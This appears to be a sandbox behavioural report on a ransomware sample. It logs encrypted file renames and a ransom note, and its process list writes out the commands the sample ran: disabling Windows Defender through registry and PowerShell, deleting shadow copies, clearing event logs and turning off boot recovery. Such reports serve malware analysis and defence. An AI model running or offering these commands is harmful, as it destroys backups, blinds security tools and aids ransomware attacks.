| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.DPV.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299611.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/1664-54-0x0000000000000000-mapping.dmp
memory/1408-55-0x0000000000000000-mapping.dmp
memory/652-56-0x0000000000000000-mapping.dmp
memory/1176-57-0x0000000000000000-mapping.dmp
memory/668-58-0x0000000000000000-mapping.dmp
memory/1492-59-0x0000000000000000-mapping.dmp
memory/620-60-0x0000000000000000-mapping.dmp
memory/1572-61-0x0000000000000000-mapping.dmp
memory/680-62-0x0000000000000000-mapping.dmp
memory/1540-63-0x0000000000000000-mapping.dmp
memory/896-64-0x0000000000000000-mapping.dmp
memory/1348-65-0x0000000000000000-mapping.dmp
memory/1444-66-0x0000000000000000-mapping.dmp
memory/1512-67-0x0000000000000000-mapping.dmp
memory/1316-68-0x0000000000000000-mapping.dmp
memory/1412-69-0x0000000000000000-mapping.dmp
memory/968-70-0x0000000000000000-mapping.dmp
memory/1740-71-0x0000000000000000-mapping.dmp
memory/1752-72-0x0000000000000000-mapping.dmp
memory/1720-73-0x0000000000000000-mapping.dmp
memory/1948-74-0x0000000000000000-mapping.dmp
memory/1748-75-0x0000000000000000-mapping.dmp
memory/1516-76-0x0000000000000000-mapping.dmp
memory/1124-77-0x0000000000000000-mapping.dmp
memory/1604-78-0x0000000000000000-mapping.dmp
memory/1920-79-0x0000000000000000-mapping.dmp
memory/1916-80-0x0000000000000000-mapping.dmp
memory/616-81-0x0000000000000000-mapping.dmp
memory/1492-82-0x0000000000000000-mapping.dmp
memory/1816-83-0x0000000000000000-mapping.dmp
memory/1636-84-0x0000000000000000-mapping.dmp
memory/1212-85-0x0000000000000000-mapping.dmp
memory/1716-86-0x0000000000000000-mapping.dmp
memory/1764-87-0x0000000000000000-mapping.dmp
memory/1412-88-0x0000000000000000-mapping.dmp
memory/1960-89-0x0000000000000000-mapping.dmp
memory/1724-90-0x0000000000000000-mapping.dmp
memory/1952-91-0x0000000000000000-mapping.dmp
memory/1500-92-0x0000000000000000-mapping.dmp
memory/1028-93-0x0000000000000000-mapping.dmp
memory/876-94-0x0000000000000000-mapping.dmp
memory/1708-95-0x0000000000000000-mapping.dmp
memory/516-96-0x0000000000000000-mapping.dmp
memory/1488-97-0x0000000000000000-mapping.dmp
memory/844-98-0x0000000000000000-mapping.dmp
memory/1348-99-0x0000000000000000-mapping.dmp
memory/1416-100-0x0000000000000000-mapping.dmp
memory/1936-101-0x0000000000000000-mapping.dmp
memory/1728-102-0x0000000000000000-mapping.dmp
memory/2044-103-0x0000000000000000-mapping.dmp
memory/1812-104-0x0000000000000000-mapping.dmp
memory/1600-105-0x0000000000000000-mapping.dmp
memory/1056-106-0x0000000000000000-mapping.dmp
memory/568-107-0x0000000000000000-mapping.dmp
memory/964-108-0x0000000000000000-mapping.dmp
memory/1900-109-0x0000000000000000-mapping.dmp
memory/1552-110-0x0000000000000000-mapping.dmp
memory/1192-111-0x0000000000000000-mapping.dmp
memory/1392-112-0x0000000000000000-mapping.dmp
memory/1496-113-0x0000000000000000-mapping.dmp
memory/1496-114-0x000007FEFBEB1000-0x000007FEFBEB3000-memory.dmp
memory/1512-115-0x0000000000000000-mapping.dmp
memory/912-117-0x0000000000000000-mapping.dmp
memory/1032-118-0x0000000000000000-mapping.dmp
memory/900-119-0x0000000000000000-mapping.dmp
memory/1296-123-0x00000000024D2000-0x00000000024D4000-memory.dmp
memory/1296-124-0x00000000024D4000-0x00000000024D7000-memory.dmp
memory/1296-122-0x00000000024D0000-0x00000000024D2000-memory.dmp
memory/1296-121-0x000007FEF30A0000-0x000007FEF3BFD000-memory.dmp
memory/1296-125-0x00000000024DB000-0x00000000024FA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2b7e39c68da69d1497cc11c82c42d3d6 |
| SHA1 | 3aec83be70b8accab3d07213a0035196bf10167e |
| SHA256 | 0a4de6bb3d62b930fefcedb8dc0970ccd3078e1be88341330d56708baec0dde7 |
| SHA512 | 6a1d318bff9f3c04b1725532ba9ef36d693cfc9a20eff1ac84a6cb089f15e148d18725368fa90890ce476d8b8aa1fe4745feb917b74b9ad6501200269fa10afd |
memory/2124-128-0x000007FEF2700000-0x000007FEF325D000-memory.dmp
memory/2124-129-0x00000000025F0000-0x00000000025F2000-memory.dmp
memory/2124-130-0x00000000025F2000-0x00000000025F4000-memory.dmp
memory/2124-131-0x00000000025F4000-0x00000000025F7000-memory.dmp
memory/2124-132-0x000000001B730000-0x000000001BA2F000-memory.dmp
memory/2124-133-0x00000000025FB000-0x000000000261A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 14:02
Reported
2022-01-13 14:07
Platform
win10-en-20211208
Max time kernel
166s
Max time network
122s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EAAAABAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EAAAABAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Professional2019DemoR_BypassTrial180-ul-oob.xrm-ms.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_LgAAAC4AAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\THMBNAIL.PNG.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-30_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Tab\TabCalendar.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EgAAABIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\lv_get.svg.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_FAAAABQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Orange Circles.htm | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\T3yp_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\LargeLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\agavedefaulticon96x96.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-72_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Fonts\FHubMDL2.ttf | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_KgAAACoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_LAAAACwAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
